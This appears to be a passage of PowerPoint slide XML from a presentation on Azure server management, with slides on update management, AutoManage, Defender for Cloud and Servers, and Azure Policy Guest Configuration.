                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft Update</a:t>
            </a:r>
            <a:endPar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Arrow: Down 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A02F01D-23F6-49E9-B8B1-C42B9330AC90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7073900" y="1120775"/>
            <a:ext cx="546100" cy="1638300"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>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EC9077C9-7F9B-4204-8DB1-C43E16268F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8185150" y="1644650"/>
            <a:ext cx="100965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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Log Analytics Agenten</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238C2060-61A3-497C-8C47-B4EC5153CA32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10280650" y="1657350"/>
            <a:ext cx="100965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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Hybrid Runbook Worker</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8" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE2D0FD-C89E-4E39-AA5C-00AD65FB00C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7493000" y="2290981"/>
            <a:ext cx="1196975" cy="9221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A9D5E7C-B56B-4159-9743-8813D6E63700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10785475" y="2303681"/>
            <a:ext cx="30099" cy="841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 Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F152CCE3-9679-413E-B578-93CD7BAF2844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596563" y="742339"/>
            <a:ext cx="4102437" cy="5355853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Does not support Optional Updates (Example: SQL Service Packs)</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New version coming here soon!</a:t>
            </a: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rPr>
              <a:t>Does not support Windows Clients OS (Requires Intune or others)</a:t>
            </a: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rPr>
              <a:t>Updates collected from the source defined on machine.</a:t>
            </a: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rPr>
              <a:t>HotPatching - Server 2022 – Azure Edition</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SMB over QUIC (SMB over UDP)</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Extended Networking</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endPar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9814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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>AutoManage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Intelligently onboard services.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479FF6E8-AA1C-451D-B4DA-650E6525B2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6332" y="1120928"/>
            <a:ext cx="6292616" cy="4409539"/>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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8C6A8ED-61D7-4118-B2DC-A76D5910D54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="4074456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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rPr>
              <a:t>Predefined profiles for management</a:t>
            </a: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rPr>
              <a:t>Production or Dev/test</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rPr>
              <a:t>Backup not activiated for dev/test</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rPr>
              <a:t>Guest Configuration Baseline</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rPr>
              <a:t>Azure Policy</a:t>
            </a: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rPr>
              <a:t>Not support in Norway East yet...</a:t>
            </a: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78398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BE34F2-DC87-47DC-B431-67693F5027F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921661" y="1243459"/>
            <a:ext cx="6401693" cy="2838846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39015C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Defender for Cloud and Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7FC82CD-4DED-4552-950F-50C231C11BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465004" y="289978"/>
            <a:ext cx="4102437" cy="5854382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="625475" indent="-269875" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1004888" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1065213" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="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1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft and third-party vulnerability management</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700" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft or Qualys</a:t>
            </a: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1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Software Inventory</a:t>
            </a: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1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IPFIX monitoring or known «bad» traffic</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900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Requries a service with public IP or LB</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endPar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1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Lisens for Defender for Endpoint (EDR) P1 eller P2</a:t>
            </a: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19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1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Adaptive Application Control = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AppLocker</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="19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19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1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Antimalware = free for Azure VM’s</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Innstalled trough Azure Extension</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600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Custom Solution with Dashboards via Log Analytics</a:t>
            </a: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2" descr="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74109397-C574-4DDD-89B3-6F27CA573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0846" y="1394651"/>
            <a:ext cx="3393024" cy="4252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34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 application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDFF497-0479-4EE1-A337-699E76170161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187572" y="643467"/>
            <a:ext cx="9816855" cy="5571066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19643319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15C4-871D-414A-A6E3-384D85BDF32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485750" y="364725"/>
            <a:ext cx="11223198" cy="546000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Azure Policy – Guest Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D48A3BF-6B6E-40E5-BF7C-3F23A84162EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483052" y="638893"/>
            <a:ext cx="4102437" cy="5854382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="355600" indent="-355600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" kern="1200">
                <a:solidFill>
